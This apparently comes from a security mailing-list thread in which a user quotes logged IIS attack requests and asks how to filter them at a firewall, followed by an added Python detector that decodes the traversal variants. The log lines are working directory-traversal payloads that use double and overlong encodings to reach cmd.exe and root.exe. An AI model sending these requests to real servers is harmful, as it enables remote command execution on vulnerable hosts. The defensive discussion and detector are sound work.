A patch was released from Microsoft in October 2000. Follow the Symantec link below.
Mark Allison
Global Cash Access / Central Credit, L.L.C.
[702-855-3037 mailto:mallison@central-credit.net]
Since this evening I am experiencing massive attacks on HTTP (IIS-oriented, I presume) from many different IP addresses.
They all look like:
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Is anyone aware that this is some new kind of worm?
Now my FW1 question: can I create an HTTP resource (secure server) that
blocks all requests that e.g. have a .EXE in them? Or would that slow
my FW1s down too much?
Any other suggestions for good products that can do HTTP content
inspection and that cooperate or can co-exist with FW1?
Thanks,
Patrick
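The requests quoted above show why a plain ".EXE" substring rule is brittle: the same traversal arrives as %255c, %%35%63, %c0%af and %c1%1c. As an added example (not from this thread), the detector below canonicalizes each request path the way a lenient decoder would before matching, so every variant in the log reduces to the same "/../" path; the sample lines, the function names and the lenient_utf8_decode model are assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request lines, using the shapes quoted in the post above.
SAMPLE_REQUESTS = [
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /index.html HTTP/1.0",  # benign control line
]

def lenient_utf8_decode(raw):
    # Assumed model of an over-permissive 2-byte UTF-8 decoder: overlong pairs
    # (C0 AF, C1 9C) and the malformed C1 1C fold back to the '/' or '\' they hide.
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "?")
            i += 1
    return "".join(out)

def canonicalize(path, rounds=3):
    # Decode repeatedly so %255c -> %5c -> '\' and %%35%63 -> %5c -> '\' are
    # unmasked; then treat '\' as '/' since Windows accepts both separators.
    cur = path
    for _ in range(rounds):
        nxt = lenient_utf8_decode(unquote_to_bytes(cur))
        if nxt == cur:
            break
        cur = nxt
    return cur.replace("\\", "/")

def classify(request_line):
    # Label a request as traversal or shell access on the canonical path; None if benign.
    m = re.match(r"^[A-Z]+ (\S+) HTTP/\d\.\d$", request_line)
    if not m:
        return "malformed-request-line"
    path = canonicalize(m.group(1).split("?", 1)[0]).lower()
    if "/../" in path + "/":
        return "directory-traversal"
    if path.endswith(("/cmd.exe", "/root.exe")):
        return "shell-request"
    return None
```

Run classify() over the request-line field of each IIS log entry; anything labelled is worth alerting on regardless of which encoding the sender picked.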